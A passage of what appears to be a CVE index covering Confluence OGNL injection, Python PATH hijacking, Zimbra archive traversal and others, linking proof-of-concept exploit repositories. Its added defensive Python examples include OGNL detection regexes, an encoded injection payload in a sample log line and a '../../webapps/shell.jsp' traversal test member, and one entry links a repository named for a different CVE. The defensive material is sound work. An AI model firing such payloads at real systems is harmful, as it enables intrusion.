- [DARKSTUFF-LAB/-CVE-2022-26134](https://github.com/DARKSTUFF-LAB/-CVE-2022-26134)
- [404fu/CVE-2022-26134-POC](https://github.com/404fu/CVE-2022-26134-POC)
- [xsxtw/CVE-2022-26134](https://github.com/xsxtw/CVE-2022-26134)
- [BBD-YZZ/Confluence-RCE](https://github.com/BBD-YZZ/Confluence-RCE)
- [cc3305/CVE-2022-26134](https://github.com/cc3305/CVE-2022-26134)
- [Agentgilspy/CVE-2022-26134](https://github.com/Agentgilspy/CVE-2022-26134)
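
The CVE-2022-26134 class is an OGNL expression injected into the request path, so a cheap retrospective check is to URL-decode the request target of each access log line and look for the `${` delimiter together with OGNL call syntax. The Python below is an added example, not code from any repository listed above or from Atlassian; the log lines are constructed in combined log format, the field layout is assumed from that format, and the marker patterns are a starting point rather than a complete signature set.

```python
# Added example (not code from any repository listed above): a retrospective
# check for OGNL expression syntax in web-server access logs. Log lines are
# constructed in combined log format; field positions are assumed from that.
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# The request line inside a combined-format access log entry.
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# OGNL expression delimiter, and call syntax that turns an expression into code.
EXPRESSION_DELIMITER = re.compile(r"\$\{")
CALL_MARKERS = (
    re.compile(r"@[\w.]+@\w+\s*\("),   # static call, e.g. @java.lang.System@getProperty(
    re.compile(r"\.getClass\s*\("),    # reflection pivot
    re.compile(r"\.forName\s*\("),     # class loading
)


def decode_target(target: str) -> str:
    """URL-decode up to three times so double-encoded payloads (%2524%257B) surface."""
    for _ in range(3):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def classify(line: str) -> Optional[str]:
    """Return 'high' (delimiter plus call syntax), 'low' (delimiter only), or None."""
    m = REQUEST_LINE.search(line)
    if not m:
        return None
    target = decode_target(m.group("target"))
    if not EXPRESSION_DELIMITER.search(target):
        return None
    if any(p.search(target) for p in CALL_MARKERS):
        return "high"
    return "low"


def scan(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (severity, decoded request target) for every flagged line."""
    hits = []
    for line in lines:
        sev = classify(line)
        if sev:
            m = REQUEST_LINE.search(line)
            hits.append((sev, decode_target(m.group("target"))))
    return hits


# Constructed sample log lines (not real traffic).
LOG_LINES = [
    '10.0.0.5 - - [03/Jun/2022:10:12:01 +0000] "GET /display/ENG/Home HTTP/1.1" 200 5120',
    '10.0.0.9 - - [03/Jun/2022:10:12:07 +0000] "GET /%24%7B%40java.lang.System%40getProperty%28%22os.name%22%29%7D/ HTTP/1.1" 302 0',
    '10.0.0.9 - - [03/Jun/2022:10:12:09 +0000] "GET /%2524%257Bfoo%257D/ HTTP/1.1" 302 0',
    '10.0.0.7 - - [03/Jun/2022:10:13:44 +0000] "GET /pages/price?amount=%2410 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for sev, target in scan(LOG_LINES):
        print(f"{sev:4} {target}")
```

Decoding more than once matters: a single `unquote` leaves `%2524%257B` as `%24%7B`, which the delimiter pattern would miss. A bare `${` with no call syntax is reported as low so that it can be triaged rather than dropped.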

### CVE-2022-26135 (2022-06-30)

A vulnerability in Mobile Plugin for Jira Data Center and Server allows a remote, authenticated user (including a user who joined via the sign-up feature) to perform a full read server-side request forgery via a batch endpoint. This affects Atlassian Jira Server and Data Center from version 8.0.0 before version 8.13.22, from version 8.14.0 before 8.20.10, from version 8.21.0 before 8.22.4. This also affects Jira Service Management Server and Data Center versions from version 4.0.0 before 4.13.22, from version 4.14.0 before 4.20.10 and from version 4.21.0 before 4.22.4.

- [assetnote/jira-mobile-ssrf-exploit](https://github.com/assetnote/jira-mobile-ssrf-exploit)
- [safe3s/CVE-2022-26135](https://github.com/safe3s/CVE-2022-26135)

### CVE-2022-26138 (2022-07-20)

The Atlassian Questions For Confluence app for Confluence Server and Data Center creates a Confluence user account in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content accessible to users in the confluence-users group. This user account is created when installing versions 2.7.34, 2.7.35, and 3.0.2 of the app.

- [alcaparra/CVE-2022-26138](https://github.com/alcaparra/CVE-2022-26138)
- [Vulnmachines/Confluence-Question-CVE-2022-26138-](https://github.com/Vulnmachines/Confluence-Question-CVE-2022-26138-)
- [z92g/CVE-2022-26138](https://github.com/z92g/CVE-2022-26138)
- [shavchen/CVE-2022-26138](https://github.com/shavchen/CVE-2022-26138)

### CVE-2022-26159 (2022-02-28)

The auto-completion plugin in Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as `plugins/web/service/search/auto-completion/<domain>/en.xml` (and similar pathnames for other languages), which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords.

- [p0dalirius/CVE-2022-26159-Ametys-Autocompletion-XML](https://github.com/p0dalirius/CVE-2022-26159-Ametys-Autocompletion-XML)

### CVE-2022-26265 (2022-03-18)

Contao Managed Edition v1.5.0 was discovered to contain a remote command execution (RCE) vulnerability via the component php_cli parameter.

- [Inplex-sys/CVE-2022-26265](https://github.com/Inplex-sys/CVE-2022-26265)
- [redteamsecurity2023/CVE-2022-26265](https://github.com/redteamsecurity2023/CVE-2022-26265)

### CVE-2022-26269 (2022-03-29)

Suzuki Connect v1.0.15 allows attackers to tamper with displayed messages via spoofed CAN messages.

- [nsbogam/CVE-2022-26269](https://github.com/nsbogam/CVE-2022-26269)

### CVE-2022-26318 (2022-03-04)

On WatchGuard Firebox and XTM appliances, an unauthenticated user can execute arbitrary code, aka FBX-22786. This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2.

- [misterxid/watchguard_cve-2022-26318](https://github.com/misterxid/watchguard_cve-2022-26318)
- [h3llk4t3/Watchguard-RCE-POC-CVE-2022-26318](https://github.com/h3llk4t3/Watchguard-RCE-POC-CVE-2022-26318)
- [BabyTeam1024/CVE-2022-26318](https://github.com/BabyTeam1024/CVE-2022-26318)

### CVE-2022-26377 (2022-06-08)

Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') vulnerability in mod_proxy_ajp of Apache HTTP Server allows an attacker to smuggle requests to the AJP server it forwards requests to. This issue affects Apache HTTP Server 2.4.53 and prior versions.

- [watchtowrlabs/ibm-qradar-ajp_smuggling_CVE-2022-26377_poc](https://github.com/watchtowrlabs/ibm-qradar-ajp_smuggling_CVE-2022-26377_poc)

### CVE-2022-26485 (2022-12-22)

Removing an XSLT parameter during processing could have led to an exploitable use-after-free. We have had reports of attacks in the wild abusing this flaw. This vulnerability affects Firefox < 97.0.2, Firefox ESR < 91.6.1, Firefox for Android < 97.3.0, Thunderbird < 91.6.2, and Focus < 97.3.0.

- [mistymntncop/CVE-2022-26485](https://github.com/mistymntncop/CVE-2022-26485)

### CVE-2022-26488 (2022-03-07)

In Python before 3.10.3 on Windows, local users can gain privileges because the search path is inadequately secured. The installer may allow a local attacker to add user-writable directories to the system search path. To exploit, an administrator must have installed Python for all users and enabled PATH entries. A non-administrative user can trigger a repair that incorrectly adds user-writable paths into PATH, enabling search-path hijacking of other users and system services. This affects Python (CPython) through 3.7.12, 3.8.x through 3.8.12, 3.9.x through 3.9.10, and 3.10.x through 3.10.2.

- [techspence/PyPATHPwner](https://github.com/techspence/PyPATHPwner)
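
The condition CVE-2022-26488 describes is a machine-wide PATH entry that a non-administrator can write to, so any process resolving commands through PATH (other users' shells, services) can be fed a planted binary. The audit below is an added example, not code from the listed repository: it splits a PATH string, flags entries that are writable, missing, or relative, and reports the position of each, since earlier entries shadow later ones. The sample PATH, the set of writable directories and the set of existing directories are constructed; the writability and existence checks are injectable so the function can be exercised without touching the host filesystem.

```python
# Added example (not code from the listed repository): an audit of search-path
# entries that a non-administrator could write to or create. The sample PATH
# and the writable set below are constructed; the filesystem is not touched.
import os
import re
from dataclasses import dataclass
from typing import Callable, List

# Windows drive-letter, UNC, or POSIX absolute path, checked lexically so the
# audit behaves the same regardless of the host it runs on.
_ABSOLUTE = re.compile(r"^(?:[A-Za-z]:[\\/]|\\\\|/)")


@dataclass
class PathFinding:
    position: int   # 0-based index in PATH; lower positions shadow higher ones
    entry: str
    problem: str    # "writable", "missing", or "relative"


def default_writable(path: str) -> bool:
    return os.path.isdir(path) and os.access(path, os.W_OK)


def audit_path(
    path_value: str,
    sep: str = os.pathsep,
    exists: Callable[[str], bool] = os.path.isdir,
    is_writable: Callable[[str], bool] = default_writable,
) -> List[PathFinding]:
    """Flag PATH entries that allow search-path hijacking.

    writable: an unprivileged user can drop a binary that shadows later entries.
    missing:  the directory does not exist; a user who can create it gets the same effect.
    relative: resolved against the current directory of whatever process runs.
    """
    findings: List[PathFinding] = []
    for i, raw in enumerate(path_value.split(sep)):
        entry = raw.strip().strip('"')
        if not entry:
            continue
        if not _ABSOLUTE.match(entry):
            findings.append(PathFinding(i, entry, "relative"))
        elif not exists(entry):
            findings.append(PathFinding(i, entry, "missing"))
        elif is_writable(entry):
            findings.append(PathFinding(i, entry, "writable"))
    return findings


# Constructed machine-wide PATH as it might look after the faulty repair:
# per-user Python directories have been appended to the system path.
SAMPLE_PATH = ";".join([
    r"C:\Windows\system32",
    r"C:\Windows",
    r"C:\Users\alice\AppData\Local\Programs\Python\Python310\Scripts",
    r"C:\Users\alice\AppData\Local\Programs\Python\Python310",
    r"C:\Tools",
    r".",
])
SAMPLE_WRITABLE = {
    r"C:\Users\alice\AppData\Local\Programs\Python\Python310\Scripts",
    r"C:\Users\alice\AppData\Local\Programs\Python\Python310",
}
SAMPLE_EXISTING = SAMPLE_WRITABLE | {r"C:\Windows\system32", r"C:\Windows"}


def audit_sample() -> List[PathFinding]:
    """Run the audit against the constructed PATH with constructed predicates."""
    return audit_path(
        SAMPLE_PATH,
        sep=";",
        exists=lambda p: p in SAMPLE_EXISTING,
        is_writable=lambda p: p in SAMPLE_WRITABLE,
    )


if __name__ == "__main__":
    for f in audit_sample():
        print(f"{f.position:2} {f.problem:8} {f.entry}")
    # Against the live environment of the current user:
    for f in audit_path(os.environ.get("PATH", "")):
        print(f"{f.position:2} {f.problem:8} {f.entry}")
```

Run as-is it reports the two per-user Python directories as writable, the non-existent `C:\Tools` as missing, and `.` as relative. Missing entries are worth keeping in the report: if an unprivileged user can create the directory, the effect is the same as a writable one.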

### CVE-2022-26503 (2022-03-17)

Deserialization of untrusted data in Veeam Agent for Windows 2.0, 2.1, 2.2, 3.0.2, 4.x, and 5.x allows local users to run arbitrary code with local system privileges.

- [sinsinology/CVE-2022-26503](https://github.com/sinsinology/CVE-2022-26503)

### CVE-2022-26629 (2022-03-24)

An access control vulnerability exists in SoroushPlus+ Messenger 1.0.30 in the Lock Screen Security Feature function due to insufficient permissions and privileges, which allows a malicious attacker to bypass the lock screen function.

- [scopion/CVE-2022-26629](https://github.com/scopion/CVE-2022-26629)
- [sysenter-eip/CVE-2022-26629](https://github.com/sysenter-eip/CVE-2022-26629)

### CVE-2022-26717 (2022-11-01)

A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.5, watchOS 8.6, iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, Safari 15.5, iTunes 12.12.4 for Windows. Processing maliciously crafted web content may lead to arbitrary code execution.

- [theori-io/CVE-2022-26717-Safari-WebGL-Exploit](https://github.com/theori-io/CVE-2022-26717-Safari-WebGL-Exploit)

### CVE-2022-26726 (2022-05-26)

This issue was addressed with improved checks. This issue is fixed in Security Update 2022-004 Catalina, watchOS 8.6, macOS Monterey 12.4, macOS Big Sur 11.6.6. An app may be able to capture a user's screen.

- [acheong08/CVE-2022-26726-POC](https://github.com/acheong08/CVE-2022-26726-POC)
- [acheong08/CVE-2022-26726-POC2](https://github.com/acheong08/CVE-2022-26726-POC2)

### CVE-2022-26757 (2022-05-26)

A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.5, iOS 15.5 and iPadOS 15.5, Security Update 2022-004 Catalina, watchOS 8.6, macOS Big Sur 11.6.6, macOS Monterey 12.4. An application may be able to execute arbitrary code with kernel privileges.

- [Dylbin/flow_divert](https://github.com/Dylbin/flow_divert)

### CVE-2022-26763 (2022-05-26)

An out-of-bounds access issue was addressed with improved bounds checking. This issue is fixed in tvOS 15.5, iOS 15.5 and iPadOS 15.5, Security Update 2022-004 Catalina, watchOS 8.6, macOS Big Sur 11.6.6, macOS Monterey 12.4. A malicious application may be able to execute arbitrary code with system privileges.

- [zhuowei/PCICrash](https://github.com/zhuowei/PCICrash)

### CVE-2022-26766 (2022-05-26)

A certificate parsing issue was addressed with improved checks. This issue is fixed in tvOS 15.5, iOS 15.5 and iPadOS 15.5, Security Update 2022-004 Catalina, watchOS 8.6, macOS Big Sur 11.6.6, macOS Monterey 12.4. A malicious app may be able to bypass signature validation.

- [zhuowei/CoreTrustDemo](https://github.com/zhuowei/CoreTrustDemo)

### CVE-2022-26809 (2022-04-15)

Remote Procedure Call Runtime Remote Code Execution Vulnerability

- [sherlocksecurity/Microsoft-CVE-2022-26809-The-Little-Boy](https://github.com/sherlocksecurity/Microsoft-CVE-2022-26809-The-Little-Boy)
- [websecnl/CVE-2022-26809](https://github.com/websecnl/CVE-2022-26809)
- [auduongxuan/CVE-2022-26809](https://github.com/auduongxuan/CVE-2022-26809)
- [corelight/cve-2022-26809](https://github.com/corelight/cve-2022-26809)
- [quijadajose/CVE-2022-26809-RCE](https://github.com/quijadajose/CVE-2022-26809-RCE)
- [oppongjohn/CVE-2022-26809-RCE](https://github.com/oppongjohn/CVE-2022-26809-RCE)
- [yuanLink/CVE-2022-26809](https://github.com/yuanLink/CVE-2022-26809)
- [s1ckb017/PoC-CVE-2022-26809](https://github.com/s1ckb017/PoC-CVE-2022-26809)
- [fuckjsonp/FuckJsonp-RCE-CVE-2022-26809-SQL-XSS-FuckJsonp](https://github.com/fuckjsonp/FuckJsonp-RCE-CVE-2022-26809-SQL-XSS-FuckJsonp)
- [michealadams30/Cve-2022-26809](https://github.com/michealadams30/Cve-2022-26809)

### CVE-2022-26923 (2022-05-10)

Active Directory Domain Services Elevation of Privilege Vulnerability

- [r1skkam/TryHackMe-CVE-2022-26923](https://github.com/r1skkam/TryHackMe-CVE-2022-26923)
- [LudovicPatho/CVE-2022-26923_AD-Certificate-Services](https://github.com/LudovicPatho/CVE-2022-26923_AD-Certificate-Services)
- [lsecqt/CVE-2022-26923-Powershell-POC](https://github.com/lsecqt/CVE-2022-26923-Powershell-POC)
- [evilashz/PIGADVulnScanner](https://github.com/evilashz/PIGADVulnScanner)
- [Gh-Badr/CVE-2022-26923](https://github.com/Gh-Badr/CVE-2022-26923)
- [Yowise/CVE-2022-26923](https://github.com/Yowise/CVE-2022-26923)

### CVE-2022-26927 (2022-05-10)

Windows Graphics Component Remote Code Execution Vulnerability

- [CrackerCat/CVE-2022-26927](https://github.com/CrackerCat/CVE-2022-26927)

### CVE-2022-26937 (2022-05-10)

Windows Network File System Remote Code Execution Vulnerability

- [corelight/CVE-2022-26937](https://github.com/corelight/CVE-2022-26937)
- [omair2084/CVE-2022-26937](https://github.com/omair2084/CVE-2022-26937)
- [Malwareman007/CVE-2022-26937](https://github.com/Malwareman007/CVE-2022-26937)

### CVE-2022-26965 (2022-03-18)

In Pluck 4.7.16, an admin user can use the theme upload functionality at /admin.php?action=themeinstall to perform remote code execution.

- [SkDevilS/Pluck-Exploitation-by-skdevils](https://github.com/SkDevilS/Pluck-Exploitation-by-skdevils)

### CVE-2022-27134 (2022-05-12)

EOSIO batdappboomx v327c04cf has an access-control vulnerability in the `transfer` function of the smart contract which allows remote attackers to win the cryptocurrency without paying the ticket fee via the `std::string memo` parameter.

- [Kenun99/CVE-batdappboomx](https://github.com/Kenun99/CVE-batdappboomx)

### CVE-2022-27226 (2022-03-19)

A CSRF issue in /api/crontab on iRZ Mobile Routers through 2022-03-16 allows a threat actor to create a crontab entry in the router administration panel. The cronjob will consequently execute the entry on the threat actor's defined interval, leading to remote code execution, allowing the threat actor to gain filesystem access. In addition, if the router's default credentials aren't rotated or a threat actor discovers valid credentials, remote code execution can be achieved without user interaction.

- [SakuraSamuraii/ez-iRZ](https://github.com/SakuraSamuraii/ez-iRZ)

### CVE-2022-27251
- [TheCyberGeek/CVE-2022-27251](https://github.com/TheCyberGeek/CVE-2022-27251)

### CVE-2022-27254 (2022-03-23)

The remote keyless system on Honda Civic 2018 vehicles sends the same RF signal for each door-open request, which allows for a replay attack, a related issue to CVE-2019-20626.

- [nonamecoder/CVE-2022-27254](https://github.com/nonamecoder/CVE-2022-27254)

### CVE-2022-27255 (2022-08-01)

In Realtek eCos RSDK 1.5.7p1 and MSDK 4.9.4p1, the SIP ALG function that rewrites SDP data has a stack-based buffer overflow. This allows an attacker to remotely execute code without authentication via a crafted SIP packet that contains malicious SDP data.

- [infobyte/cve-2022-27255](https://github.com/infobyte/cve-2022-27255)
- [stryker-project/CVE-2022-27255-checker](https://github.com/stryker-project/CVE-2022-27255-checker)

### CVE-2022-27413 (2022-05-03)

Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the adminname parameter in admin.php.

- [HH1F/CVE-2022-27413](https://github.com/HH1F/CVE-2022-27413)

### CVE-2022-27414
- [lus33rr/CVE-2022-27414](https://github.com/lus33rr/CVE-2022-27414)

### CVE-2022-27434 (2022-07-17)

UNIT4 TETA Mobile Edition (ME) before 29.5.HF17 was discovered to contain a SQL injection vulnerability via the ProfileName parameter in the errorReporting page.

- [LongWayHomie/CVE-2022-27434](https://github.com/LongWayHomie/CVE-2022-27434)

### CVE-2022-27438 (2022-06-06)

Caphyon Ltd Advanced Installer 19.3 and earlier and many products that use the updater from Advanced Installer (Advanced Updater) are affected by a remote code execution vulnerability via the CustomDetection parameter in the update check function. To exploit this vulnerability, a user must start an affected installation to trigger the update check.

- [gerr-re/cve-2022-27438](https://github.com/gerr-re/cve-2022-27438)

### CVE-2022-27499 (2022-11-11)

Premature release of resource during expected lifetime in the Intel(R) SGX SDK software may allow a privileged user to potentially enable information disclosure via local access.

- [StanPlatinum/snapshot-attack-demo](https://github.com/StanPlatinum/snapshot-attack-demo)

### CVE-2022-27502 (2022-06-10)

RealVNC VNC Server 5.1.0 through 6.9.0 for Windows allows local privilege escalation because an installer repair operation executes %TEMP% files as SYSTEM.

- [alirezac0/CVE-2022-27502](https://github.com/alirezac0/CVE-2022-27502)

### CVE-2022-27518 (2022-12-13)

Unauthenticated remote arbitrary code execution

- [dolby360/CVE-2022-27518_POC](https://github.com/dolby360/CVE-2022-27518_POC)

### CVE-2022-27646 (2023-03-29)

This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6700v3 1.0.4.120_10.0.91 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the circled daemon. A crafted circleinfo.txt file can trigger an overflow of a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-15879.

- [cyber-defence-campus/netgear_r6700v3_circled](https://github.com/cyber-defence-campus/netgear_r6700v3_circled)

### CVE-2022-27665 (2023-04-03)

Reflected XSS (via AngularJS sandbox escape expressions) exists in Progress Ipswitch WS_FTP Server 8.6.0. This can lead to execution of malicious code and commands on the client due to improper handling of user-provided input. By inputting malicious payloads in the subdirectory searchbar or Add folder filename boxes, it is possible to execute client-side commands. For example, there is Client-Side Template Injection via subFolderPath to the ThinClient/WtmApiService.asmx/GetFileSubTree URI.

- [dievus/CVE-2022-27665](https://github.com/dievus/CVE-2022-27665)

### CVE-2022-27666 (2022-03-23)

A heap buffer overflow flaw was found in IPsec ESP transformation code in net/ipv4/esp4.c and net/ipv6/esp6.c. This flaw allows a local attacker with normal user privileges to overwrite kernel heap objects and may lead to local privilege escalation.

- [plummm/CVE-2022-27666](https://github.com/plummm/CVE-2022-27666)
- [Albocoder/cve-2022-27666-exploits](https://github.com/Albocoder/cve-2022-27666-exploits)

### CVE-2022-27772 (2022-03-30)

spring-boot versions prior to v2.2.11.RELEASE were vulnerable to temporary directory hijacking. This vulnerability affected the org.springframework.boot.web.server.AbstractConfigurableWebServerFactory.createTempDir method. NOTE: This vulnerability only affects products and/or versions that are no longer supported by the maintainer.

- [puneetbehl/grails3-cve-2022-27772](https://github.com/puneetbehl/grails3-cve-2022-27772)

### CVE-2022-27925 (2022-04-20)

Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. An authenticated user with administrator rights has the ability to upload arbitrary files to the system, leading to directory traversal.

- [vnhacker1337/CVE-2022-27925-PoC](https://github.com/vnhacker1337/CVE-2022-27925-PoC)
- [mohamedbenchikh/CVE-2022-27925](https://github.com/mohamedbenchikh/CVE-2022-27925)
- [miko550/CVE-2022-27925](https://github.com/miko550/CVE-2022-27925)
- [navokus/CVE-2022-27925](https://github.com/navokus/CVE-2022-27925)
- [Josexv1/CVE-2022-27925](https://github.com/Josexv1/CVE-2022-27925)
- [Chocapikk/CVE-2022-27925-Revshell](https://github.com/Chocapikk/CVE-2022-27925-Revshell)
- [akincibor/CVE-2022-27925](https://github.com/akincibor/CVE-2022-27925)
- [lolminerxmrig/CVE-2022-27925-Revshell](https://github.com/lolminerxmrig/CVE-2022-27925-Revshell)
- [touchmycrazyredhat/CVE-2022-27925-Revshell](https://github.com/touchmycrazyredhat/CVE-2022-27925-Revshell)
- [jam620/Zimbra](https://github.com/jam620/Zimbra)
- [Inplex-sys/CVE-2022-27925](https://github.com/Inplex-sys/CVE-2022-27925)
- [onlyHerold22/CVE-2022-27925-PoC](https://github.com/onlyHerold22/CVE-2022-27925-PoC)
- [sanan2004/CVE-2022-27925](https://github.com/sanan2004/CVE-2022-27925)
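
The mboximport weakness is the classic archive-extraction traversal: if a member name is joined to the destination directory without checking where the resolved path ends up, a name such as `../../x` lands outside the intended tree. The extractor below is an added example, not Zimbra's code: it resolves each member against the destination and refuses any that escapes it or is absolute. The archive it processes is constructed in memory, and the `mailbox/` and `webapps/` member names are illustrative only.

```python
# Added example (not Zimbra code): extracting an uploaded ZIP without
# directory traversal. The archive and its member names are constructed.
import io
import tempfile
import zipfile
from pathlib import Path


def safe_member_path(dest: Path, name: str) -> Path:
    """Resolve `name` under `dest`; reject absolute names and traversal."""
    if name.startswith(("/", "\\")) or (len(name) > 1 and name[1] == ":"):
        raise ValueError(f"absolute member name rejected: {name!r}")
    dest_resolved = dest.resolve()
    target = (dest / name).resolve()
    if target != dest_resolved and dest_resolved not in target.parents:
        raise ValueError(f"member escapes destination: {name!r}")
    return target


def extract_archive(data: bytes, dest: Path):
    """Extract members under dest; return (written, rejected) member names."""
    written, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            try:
                target = safe_member_path(dest, info.filename)
            except ValueError:
                rejected.append(info.filename)
                continue
            if info.is_dir():
                target.mkdir(parents=True, exist_ok=True)
            else:
                target.parent.mkdir(parents=True, exist_ok=True)
                target.write_bytes(zf.read(info))
            written.append(info.filename)
    return written, rejected


def build_test_archive() -> bytes:
    """Constructed upload: one benign member and one traversal member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("mailbox/inbox.eml", b"From: a@example.test\n")
        zf.writestr("../../webapps/shell.jsp", b"<% %>")
    return buf.getvalue()


def demo() -> dict:
    """Extract the constructed archive into a fresh temp dir and report the outcome."""
    with tempfile.TemporaryDirectory() as tmp:
        dest = Path(tmp) / "import"
        written, rejected = extract_archive(build_test_archive(), dest)
        return {
            "written": written,
            "rejected": rejected,
            "inbox_present": (dest / "mailbox" / "inbox.eml").is_file(),
            # ../../ from tmp/import would land beside tmp itself
            "escaped_file_present": (Path(tmp).parent / "webapps" / "shell.jsp").exists(),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The check compares fully resolved paths rather than looking for `..` in the name, so it also catches symlinked destinations and names that only normalise to a traversal. Rejected members are reported rather than silently skipped; in an import feature that is the signal worth logging.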

### CVE-2022-27927 (2022-04-19)

A SQL injection vulnerability exists in Microfinance Management System 1.0 when MySQL is being used as the application database. An attacker can issue SQL commands to the MySQL database through the vulnerable course_code and/or customer_number parameter.

- [erengozaydin/Microfinance-Management-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated](https://github.com/erengozaydin/Microfinance-Management-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated)

### CVE-2022-27997
- [Cyb3rEnthusiast/CVE-2023-27997](https://github.com/Cyb3rEnthusiast/CVE-2023-27997)

### CVE-2022-28077 (2022-05-11)

Home Owners Collection Management v1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the Admin panel via the $_GET['s'] parameter.

- [bigzooooz/CVE-2022-28077](https://github.com/bigzooooz/CVE-2022-28077)

### CVE-2022-28078 (2022-05-11)

Home Owners Collection Management v1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the Admin panel via the $_GET['page'] parameter.

- [bigzooooz/CVE-2022-28078](https://github.com/bigzooooz/CVE-2022-28078)

### CVE-2022-28079 (2022-05-05)

College Management System v1.0 was discovered to contain a SQL injection vulnerability via the course_code parameter.

- [erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated](https://github.com/erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated)

### CVE-2022-28080 (2022-05-05)

Royal Event Management System v1.0 was discovered to contain a SQL injection vulnerability via the todate parameter.

- [erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated](https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated)

### CVE-2022-28099 (2022-05-04)

Poultry Farm Management System v1.0 was discovered to contain a SQL injection vulnerability via the Item parameter at /farm/store.php.

- [IbrahimEkimIsik/CVE-2022-28099](https://github.com/IbrahimEkimIsik/CVE-2022-28099)

### CVE-2022-28113 (2022-04-15)

An issue in upload.csp of FANTEC GmbH MWiD25-DS Firmware v2.000.030 allows attackers to write files and reset the user passwords without having a valid session cookie.

- [code-byter/CVE-2022-28113](https://github.com/code-byter/CVE-2022-28113)

### CVE-2022-28117 (2022-04-28)

A Server-Side Request Forgery (SSRF) in feed_parser class of Navigate CMS v2.9.4 allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the feed parameter.

- [cheshireca7/CVE-2022-28117](https://github.com/cheshireca7/CVE-2022-28117)
- [kimstars/POC-CVE-2022-28117](https://github.com/kimstars/POC-CVE-2022-28117)

### CVE-2022-28118 (2022-05-03)

SiteServer CMS v7.x allows attackers to execute arbitrary code via a crafted plug-in.

- [Richard-Tang/SSCMS-PluginShell](https://github.com/Richard-Tang/SSCMS-PluginShell)

### CVE-2022-28132

The T-Soft E-Commerce 4 web application is susceptible to SQL injection (SQLi) attacks when authenticated as an admin or privileged user. This vulnerability allows attackers to access and manipulate the database through crafted requests. By exploiting this flaw, attackers can bypass authentication mechanisms, view sensitive information stored in the database, and potentially exfiltrate data.

- [alpernae/CVE-2022-28132](https://github.com/alpernae/CVE-2022-28132)

### CVE-2022-28171 (2022-06-27)

The web module in some Hikvision Hybrid SAN/Cluster Storage products has the following security vulnerability. Due to insufficient input validation, an attacker can exploit the vulnerability to execute restricted commands by sending messages with malicious commands to the affected device.

- [NyaMeeEain/CVE-2022-28171-POC](https://github.com/NyaMeeEain/CVE-2022-28171-POC)

### CVE-2022-28219 (2022-04-05)

Cewolf in Zoho ManageEngine ADAudit Plus before 7060 is vulnerable to an unauthenticated XXE attack that leads to Remote Code Execution.

- [horizon3ai/CVE-2022-28219](https://github.com/horizon3ai/CVE-2022-28219)
- [rbowes-r7/manageengine-auditad-cve-2022-28219](https://github.com/rbowes-r7/manageengine-auditad-cve-2022-28219)
- [aeifkz/CVE-2022-28219-Like](https://github.com/aeifkz/CVE-2022-28219-Like)

### CVE-2022-28281 (2022-12-22)

If a compromised content process sent an unexpected number of WebAuthN Extensions in a Register command to the parent process, an out of bounds write would have occurred leading to memory corruption and a potentially exploitable crash. This vulnerability affects Thunderbird < 91.8, Firefox < 99, and Firefox ESR < 91.8.

- [0vercl0k/CVE-2022-28281](https://github.com/0vercl0k/CVE-2022-28281)

### CVE-2022-28282 (2022-12-22)

By using a link with `rel="localization"` a use-after-free could have been triggered by destroying an object during JavaScript execution and then referencing the object through a freed pointer, leading to a potential exploitable crash. This vulnerability affects Thunderbird < 91.8, Firefox < 99, and Firefox ESR < 91.8.

- [bb33bb/CVE-2022-28282-firefox](https://github.com/bb33bb/CVE-2022-28282-firefox)

### CVE-2022-28346 (2022-04-12)

An issue was discovered in Django 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4. The `QuerySet.annotate()`, `aggregate()`, and `extra()` methods are subject to SQL injection in column aliases via a crafted dictionary (with dictionary expansion) passed as `**kwargs`.

- [YouGina/CVE-2022-28346](https://github.com/YouGina/CVE-2022-28346)
- [DeEpinGh0st/CVE-2022-28346](https://github.com/DeEpinGh0st/CVE-2022-28346)
- [ahsentekd/CVE-2022-28346](https://github.com/ahsentekd/CVE-2022-28346)
- [vincentinttsh/CVE-2022-28346](https://github.com/vincentinttsh/CVE-2022-28346)
- [kamal-marouane/CVE-2022-28346](https://github.com/kamal-marouane/CVE-2022-28346)

### CVE-2022-28368 (2022-04-03)

Dompdf 1.2.1 allows remote code execution via a .php file in the src:url field of an @font-face Cascading Style Sheets (CSS) statement (within an HTML input file).

- [rvizx/CVE-2022-28368](https://github.com/rvizx/CVE-2022-28368)
- [That-Guy-Steve/CVE-2022-28368-handler](https://github.com/That-Guy-Steve/CVE-2022-28368-handler)
- [Henryisnotavailable/Dompdf-Exploit-RCE](https://github.com/Henryisnotavailable/Dompdf-Exploit-RCE)

